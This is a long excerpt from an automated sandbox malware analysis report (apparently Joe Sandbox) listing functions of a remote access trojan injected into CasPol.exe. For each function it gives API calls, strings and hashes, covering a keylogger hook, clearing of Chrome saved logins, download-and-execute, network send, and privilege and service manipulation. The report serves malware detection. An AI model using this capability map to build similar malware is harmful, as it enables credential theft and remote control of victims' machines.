                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                              • String ID: <D$<D$<D
                                                                                                              • API String ID: 745075371-3495170934
                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                              Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2341273852-0
                                                                                                              • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                              • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                                                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                              Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                              • API String ID: 341183262-3780268858
                                                                                                              • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                              • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                                                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                              Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • GetMessageA.USER32 ref: 00409A6B
                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                              Strings
                                                                                                              • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                              • String ID: Keylogger initialization failure: error
                                                                                                              • API String ID: 3219506041-952744263
                                                                                                              • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                              • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                                                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                              Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041301A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413026
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004131ED
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                              • API String ID: 2127411465-314212984
                                                                                                              • Opcode ID: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                                                                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                              • Opcode Fuzzy Hash: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                                                                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                              Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32 ref: 004124F5
                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                              • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                              • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                              Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                              Strings
                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                              • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                              • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                                                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                              Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                              Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?), ref: 00404811
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 4043647387-0
                                                                                                              • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                              • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                                                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                              Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                              • String ID:
                                                                                                              • API String ID: 276877138-0
                                                                                                              • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                              • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                              Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 00415970
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                              • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                              • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                              Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                              • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID: ACP$OCP
                                                                                                              • API String ID: 2299586839-711371036
                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                              Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040E183,00000000), ref: 0041A650
                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID: SETTINGS
                                                                                                              • API String ID: 3473537107-594951305
                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                              Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 1157919129-0
                                                                                                              • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                              • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                              Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 00448233
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                              • String ID:
                                                                                                              • API String ID: 1286116820-0
                                                                                                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                              • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                              • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                              Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                              • API String ID: 2825088817-4197237851
                                                                                                              • Opcode ID: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                              • Opcode Fuzzy Hash: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                              Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                              • String ID: x@G$x@G
                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                              • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                              • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                              Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000), ref: 00412709
                                                                                                                • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0), ref: 00412714
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
